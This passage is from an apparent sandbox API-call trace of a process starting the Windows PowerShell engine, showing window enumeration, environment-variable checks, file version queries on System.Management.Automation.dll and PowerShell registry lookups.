	[0322.330] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x460
	[0324.549] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x460
	[0325.456] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x44c
	[0325.456] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x778
	[0325.456] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x460
	[0325.456] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x558
	[0325.456] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0325.456] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0325.456] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xde0
	[0325.457] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xddc
	[0325.457] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xdd8
	[0325.457] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xd34
	[0325.457] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xd10
	[0325.457] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xd0c
	[0325.457] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xc9c
	[0325.457] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xc74
	[0325.457] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xc1c
	[0325.458] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xc08
	[0325.458] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xabc
	[0325.458] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x24c
	[0325.458] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xbb0
	[0325.458] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xbfc
	[0325.458] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xb10
	[0325.458] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x374
	[0325.458] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x368
	[0325.459] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xb28
	[0325.459] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xae8
	[0325.459] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xb14
	[0325.459] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x95c
	[0325.459] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xa8c
	[0325.459] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x46c
	[0325.459] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xb3c
	[0325.459] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xa90
	[0325.460] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xad0
	[0325.460] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xa9c
	[0325.460] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xaa0
	[0325.460] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xb1c
	[0325.460] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x7e0
	[0325.460] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xa74
	[0325.460] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x694
	[0325.460] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xa28
	[0325.461] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x9b0
	[0325.461] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x8d8
	[0325.461] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x940
	[0325.461] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x93c
	[0325.461] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4ec
	[0325.461] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x150
	[0325.461] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x720
	[0325.461] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x3c4
	[0325.462] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x7d4
	[0325.462] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x6c8
	[0325.462] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xb54
	[0325.462] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xb54
	[0325.462] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xb5c
	[0325.462] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x838
	[0325.462] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x818
	[0325.462] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x5b8
	[0325.463] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x494
	[0325.463] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x1ec
	[0325.463] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x440
	[0325.463] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x7e8
	[0325.463] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x730
	[0325.463] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x2c8
	[0325.463] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x31c
	[0325.463] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x330
	[0325.464] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x128
	[0325.464] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x5c8
	[0325.464] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x6f8
	[0325.464] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x358
	[0325.464] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x73c
	[0325.464] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xb0
	[0325.464] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x250
	[0325.464] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x240
	[0325.465] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x790
	[0325.465] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x61c
	[0325.465] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x568
	[0325.465] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x538
	[0325.465] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x540
	[0325.465] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x460
	[0325.465] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x79c
	[0325.465] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4e0
	[0325.465] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x460
	[0325.466] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x778
	[0325.469] WerSetFlags () returned 0x0
	[0325.477] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0325.477] CoTaskMemFree (pv=0x0) 
	[0325.479] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1ce1a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1ce1a0 | out: pulNumLanguages=0x1ce1a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1ce1a0) returned 1
	[0325.479] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1ce1a8, pwszLanguagesBuffer=0x2bd1ae0, pcchLanguagesBuffer=0x1ce1a0 | out: pulNumLanguages=0x1ce1a8, pwszLanguagesBuffer=0x2bd1ae0, pcchLanguagesBuffer=0x1ce1a0) returned 1
	[0325.484] CoTaskMemAlloc (cb=0x24) returned 0x4525e0
	[0325.484] GetUserDefaultLocaleName (in: lpLocaleName=0x4525e0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0325.485] CoTaskMemFree (pv=0x4525e0) 
	[0326.460] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0326.460] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0326.460] CoTaskMemFree (pv=0x436a00) 
	[0326.462] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0326.462] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0326.462] CoTaskMemFree (pv=0x436a00) 
	[0326.464] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0326.464] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0326.464] CoTaskMemFree (pv=0x436a00) 
	[0326.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0326.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0326.474] SetErrorMode (uMode=0x1) returned 0x1
	[0326.475] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1cde20 | out: lpFileInformation=0x1cde20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0326.475] SetErrorMode (uMode=0x1) returned 0x1
	[0326.475] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1ce090 | out: lpdwHandle=0x1ce090) returned 0x94c
	[0326.476] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bd5370 | out: lpData=0x2bd5370) returned 1
	[0326.476] VerQueryValueW (in: pBlock=0x2bd5370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ce008, puLen=0x1ce000 | out: lplpBuffer=0x1ce008*=0x2bd540c, puLen=0x1ce000) returned 1
	[0326.476] VerQueryValueW (in: pBlock=0x2bd5370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1cdf78, puLen=0x1cdf70 | out: lplpBuffer=0x1cdf78*=0x2bd54e8, puLen=0x1cdf70) returned 1
	[0326.476] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0326.476] CoTaskMemAlloc (cb=0x2e) returned 0x44bc50
	[0326.476] lstrcpyW (in: lpString1=0x44bc50, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0326.476] CoTaskMemFree (pv=0x44bc50) 
	[0326.477] VerQueryValueW (in: pBlock=0x2bd5370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1cdf78, puLen=0x1cdf70 | out: lplpBuffer=0x1cdf78*=0x2bd553c, puLen=0x1cdf70) returned 1
	[0326.477] lstrlenW (lpString="System.Management.Automation") returned 28
	[0326.477] CoTaskMemAlloc (cb=0x3c) returned 0x447a60
	[0326.477] lstrcpyW (in: lpString1=0x447a60, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0326.477] CoTaskMemFree (pv=0x447a60) 
	[0326.477] VerQueryValueW (in: pBlock=0x2bd5370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1cdf78, puLen=0x1cdf70 | out: lplpBuffer=0x1cdf78*=0x2bd5598, puLen=0x1cdf70) returned 1
	[0326.477] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0326.477] CoTaskMemAlloc (cb=0x20) returned 0x452640
	[0326.477] lstrcpyW (in: lpString1=0x452640, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0326.477] CoTaskMemFree (pv=0x452640) 
	[0326.477] VerQueryValueW (in: pBlock=0x2bd5370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1cdf78, puLen=0x1cdf70 | out: lplpBuffer=0x1cdf78*=0x2bd55d8, puLen=0x1cdf70) returned 1
	[0326.477] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0326.477] CoTaskMemAlloc (cb=0x44) returned 0x447a60
	[0326.477] lstrcpyW (in: lpString1=0x447a60, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0326.477] CoTaskMemFree (pv=0x447a60) 
	[0326.477] VerQueryValueW (in: pBlock=0x2bd5370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1cdf78, puLen=0x1cdf70 | out: lplpBuffer=0x1cdf78*=0x2bd5640, puLen=0x1cdf70) returned 1
	[0326.477] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0326.477] CoTaskMemAlloc (cb=0x76) returned 0x3f5770
	[0326.477] lstrcpyW (in: lpString1=0x3f5770, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0326.477] CoTaskMemFree (pv=0x3f5770) 
	[0326.477] VerQueryValueW (in: pBlock=0x2bd5370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1cdf78, puLen=0x1cdf70 | out: lplpBuffer=0x1cdf78*=0x2bd56dc, puLen=0x1cdf70) returned 1
	[0326.477] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0326.477] CoTaskMemAlloc (cb=0x44) returned 0x447a60
	[0326.477] lstrcpyW (in: lpString1=0x447a60, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0326.477] CoTaskMemFree (pv=0x447a60) 
	[0326.477] VerQueryValueW (in: pBlock=0x2bd5370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1cdf78, puLen=0x1cdf70 | out: lplpBuffer=0x1cdf78*=0x2bd5740, puLen=0x1cdf70) returned 1
	[0326.477] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0326.477] CoTaskMemAlloc (cb=0x58) returned 0x417790
	[0326.477] lstrcpyW (in: lpString1=0x417790, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0326.477] CoTaskMemFree (pv=0x417790) 
	[0326.478] VerQueryValueW (in: pBlock=0x2bd5370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1cdf78, puLen=0x1cdf70 | out: lplpBuffer=0x1cdf78*=0x2bd57bc, puLen=0x1cdf70) returned 1
	[0326.478] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0326.478] CoTaskMemAlloc (cb=0x20) returned 0x452640
	[0326.478] lstrcpyW (in: lpString1=0x452640, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0326.478] CoTaskMemFree (pv=0x452640) 
	[0326.478] VerQueryValueW (in: pBlock=0x2bd5370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1cdf78, puLen=0x1cdf70 | out: lplpBuffer=0x1cdf78*=0x2bd5464, puLen=0x1cdf70) returned 1
	[0326.478] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0326.478] CoTaskMemAlloc (cb=0x66) returned 0x444720
	[0326.478] lstrcpyW (in: lpString1=0x444720, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0326.478] CoTaskMemFree (pv=0x444720) 
	[0326.478] VerQueryValueW (in: pBlock=0x2bd5370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1cdf78, puLen=0x1cdf70 | out: lplpBuffer=0x1cdf78*=0x0, puLen=0x1cdf70) returned 0
	[0326.478] VerQueryValueW (in: pBlock=0x2bd5370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1cdf78, puLen=0x1cdf70 | out: lplpBuffer=0x1cdf78*=0x0, puLen=0x1cdf70) returned 0
	[0326.478] VerQueryValueW (in: pBlock=0x2bd5370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1cdf78, puLen=0x1cdf70 | out: lplpBuffer=0x1cdf78*=0x0, puLen=0x1cdf70) returned 0
	[0326.478] VerQueryValueW (in: pBlock=0x2bd5370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cdf48, puLen=0x1cdf40 | out: lplpBuffer=0x1cdf48*=0x2bd540c, puLen=0x1cdf40) returned 1
	[0326.478] CoTaskMemAlloc (cb=0x204) returned 0x40c280
	[0326.478] VerLanguageNameW (in: wLang=0x0, szLang=0x40c280, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0326.478] CoTaskMemFree (pv=0x40c280) 
	[0326.478] VerQueryValueW (in: pBlock=0x2bd5370, lpSubBlock="\\", lplpBuffer=0x1cdf98, puLen=0x1cdf90 | out: lplpBuffer=0x1cdf98*=0x2bd5398, puLen=0x1cdf90) returned 1
	[0326.487] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0326.487] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0326.487] CoTaskMemFree (pv=0x436a00) 
	[0326.491] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0326.491] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0326.491] CoTaskMemFree (pv=0x436a00) 
	[0326.494] lstrlenW (lpString="䅁") returned 1
	[0327.316] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cde68 | out: phkResult=0x1cde68*=0x2f0) returned 0x0
	[0327.318] RegOpenKeyExW (in: hKey=0x2f0, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cde58 | out: phkResult=0x1cde58*=0x2f4) returned 0x0
	[0327.318] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdee8 | out: phkResult=0x1cdee8*=0x2f8) returned 0x0
	[0327.323] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cde2c, lpData=0x0, lpcbData=0x1cde28*=0x0 | out: lpType=0x1cde2c*=0x1, lpData=0x0, lpcbData=0x1cde28*=0x56) returned 0x0
	[0327.323] CoTaskMemAlloc (cb=0x5a) returned 0x4446b0
	[0327.324] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cddfc, lpData=0x4446b0, lpcbData=0x1cddf8*=0x56 | out: lpType=0x1cddfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cddf8*=0x56) returned 0x0
	[0327.324] CoTaskMemFree (pv=0x4446b0) 
	[0327.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0327.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0327.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0327.842] CoTaskMemAlloc (cb=0x104) returned 0x436a00
	[0327.842] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436a00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0327.842] CoTaskMemFree (pv=0x436a00) 
	[0330.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cda20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0330.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cda20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0331.272] CoTaskMemAlloc (cb=0x104) returned 0x436b10
	[0331.272] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436b10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0331.272] CoTaskMemFree (pv=0x436b10) 
	[0331.274] CoTaskMemAlloc (cb=0x104) returned 0x436b10
	[0331.274] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436b10, nSize=0x80 | out: lpBuffer="") returned 0x0
